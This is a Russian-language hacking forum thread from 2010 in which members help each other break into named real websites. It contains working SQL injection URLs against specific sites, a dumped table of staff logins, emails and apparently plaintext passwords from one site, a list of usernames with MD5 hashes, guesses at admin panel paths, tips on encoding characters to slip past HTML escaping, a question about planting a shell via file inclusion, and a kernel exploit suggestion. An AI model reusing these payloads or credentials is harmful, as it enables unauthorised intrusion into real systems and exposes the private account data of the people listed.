Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    а админку?
    kitcom.ru/admin
     
  2. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    нашел
    http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,name+from+groups
     
  3. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    держи
    PHP:
    login      email      pwd
    aav     vml
    @kitcom.ru     tirthadas
    admin     glebov
    @kitcom.ru     flvby1
    bea     support
    @kitcom.ru     cosys976
    biv     ivan     flvby2_
    glbuh     kvi
    @kitcom.ru     flvby2_3
    gvv     svg
    @kitcom.ru     flvby3_3
    ivan     biv
    @kitcom.ru     flvby_3
    ivan
    @kitco     kvp1@kitcom.ru     flvby42_
    kel     mobil
    @kitcom.ru     fsota2_
    KNN     glbuh
    @kitcom.ru     lvvy42_
    kvi     ivan
    @kitcom.ru     flvby2_
    kvp1     sna
    @kitcom.ru     job04
    KVV     nshr     nshr1_
    Ljcneg     support
    @kitcom.ru     Pfrfhsn
    news     sps
    @kitcom.ru     yjDsq2_
    nshr     kel
    @kitcom.ru     TotKjby_
    sna     gsa
    @kitcom.ru     news_
    sps     bea
    @kitcom.ru     job1104
    svg     tea
    @kitcom.ru     dynax19xxx
    tea     knn
    @kitcom.ru     KNN
    vml     kv
    @kitcom.ru     KVV
     
    1 person likes this.
  4. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    огромное спасибо
    --------------
    ток при входе пишет что неправильные данные
     
  5. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    дал всё что было
     
  6. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ладно спасибо мне просто интересно
     
  7. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    помогите найти админку

    http://www.karat-telecom.ru/
     
  8. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    http://www.karat-telecom.ru/Album/login.php

    http://www.karat-telecom.ru/Album/admin.php - У Вас нет прав для просмотра этой страницы.
     
    #14968 Gedj, 3 Oct 2010
    Last edited: 3 Oct 2010
    1 person likes this.
  9. The Elusive

    The Elusive New Member

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    Думаю ты искал это =)
    Code:
    username 	password
    azrael	50ec504080ee3b965271235bf7789946
    fies	5452eea2e1ff9cefa25f5fb590386dfb
    muster	96f570c3c87558604e79f35637b4663c
    test	098f6bcd4621d373cade4e832627b4f6
     
    1 person likes this.
  10. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+%28select+1+from+%28select+count%280%29,concat%28%28select+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--

    дальше сам крути...
     
    1 person likes this.
  11. moby.exe

    moby.exe New Member

    Joined:
    15 Sep 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    На сайте в комментах знаки
    Code:
    < >
    преобразуются в
    Code:
    &lt;     &gt;
    и выводятся обычным текстом. Это можно как-нибудь обойти?
     
    #14971 moby.exe, 3 Oct 2010
    Last edited: 4 Oct 2010
  12. The Elusive

    The Elusive New Member

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    < > Можно закодировать так.
    Code:
    %3C%20%3E
    URL
    Code:
    < &#x3E
    HTML
    Code:
    &#60&#32&#62
    Decimal
     
  13. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Где сохраняются аватары в phpBB? Есть ЛФИ и полный путь к сайту, пробую подгрузить в аватаре в метаданных пхп код, но выводится она похоже через скрипт, неужели прямо в бд сохраняются аватары? Если так, то как еще можно загрузить шелл? Спасибо
     
  14. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    pomoqite nayti adminku..
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    officepro.am/controlpanel/
    officepro.am/cpanel/
    officepro.am/kpanel/
     
    1 person likes this.
  16. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Помогите найти сплоит под ядро

     
  17. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    probuy/
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    sock_sendpage() должен сработать...
     
  19. asia555

    asia555 New Member

    Joined:
    25 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Возможно ли проведение sql-инъекции?
    $query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"';
    Спасибо
     
  20. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Невозможно.
     
    1 person likes this.
Thread Status:
Not open for further replies.